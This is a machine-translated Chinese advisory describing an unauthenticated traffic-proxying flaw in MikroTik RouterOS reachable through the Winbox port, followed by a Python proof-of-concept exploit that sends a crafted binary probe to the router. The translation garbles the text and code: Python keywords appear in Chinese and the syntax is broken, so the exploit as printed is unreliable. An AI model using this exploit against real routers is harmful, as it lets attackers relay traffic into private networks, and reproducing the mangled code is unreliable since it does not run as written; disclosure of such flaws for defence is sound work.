MikroTik RouterOS未经身份验证的中介

MikroTik的那个家伙有一个网络发现功能,发送用户定义的探针发现网络服务。有各种预定义的探针对HTTP、FTP、Telnet等。

这个网络扫描功能还支持“递归扫描”的探测器可以通过MikroTik Winbox港口代理(8291)。站得住脚的发现验证是没有在这些代理实施调查请求。因此,未经过身份验证的远程攻击者可以利用MikroTik路由器代理任意交通。此外,攻击者在广域网可以使用这个特性在局域网向主机发送请求。

有一些局限性MikroTik探针的功能。调查只支持3个请求和响应。同时,响应不转播回发出请求的客户机。响应而不是一个正则表达式匹配探测器中定义的格式。

以下概念证明发送一个HTTP GET请求到一个公共IP地址和匹配响应“^ HTTP / 1.1 200 ok \ r \ nServer: micro_httpd。”

进口argparse进口插座if __name__ = =“__main__”: cmd_parser = argparse.ArgumentParser cmd_parser(描述=“PoC”)。add_argument(“我”,“——ip”, action =“商店”,dest =“知识产权”,要求= True,帮助=“路由器ip”) cmd_parser。add_argument (“p”,“——港口”,action =“商店”,dest =“端口”= int类型,帮助=“Winbox港口”,默认= " 8291 ")cmd_parser。add_argument (“n”、”——“action =“商店”,dest =“名称”,帮助=“新主机名”)参数= cmd_parser.parse_args () # Mikrotik路由器袜子= socket.socket(套接字连接。AF_INET socket.SOCK_STREAM)打印”[+]试图连接到“+参数。ip +“:”+ str (args.port) sock.connect ((arg游戏。ip, args.port)打印”[+]连接!”请求= (‘\ x9e \ x01 \ x00 \ x9c \ x4d \ x32 \ x05 \ x00 \ xff \ x01 \ x03 \ x00 \ x00 \ (\×\ xfc \ x7b \ x5a \ x04’‘\ x00 \ x00 \ x09 \×50 \ x06 \ x00 \ xff \ x09 \ x01 \ x07 \ x00 \ xff \ x09 \ x01 \ x07 \ x00 \ x00 \ x21 \ x46 ' '得到/ HTTP / 1.1 \ r \ nHost: 66.252.123.90 \ r \ nUser-Agent:哎呀\ r \ nAccept: * / * \ r \ n ' ' \ r \ n \ (\ x00 \ x00 \ x21 \ 25 ^ HTTP / 1.1 200 Ok \ r \ nServer: micro_httpd \ x01 \ x00 \ xff’‘\ x88 \ x01 \ x00 \ x68 \ x00 \ x00 \ x00 ') sock.sendall(请求)职责= sock.recv(1024)打印“< -”+ resp sock.close ()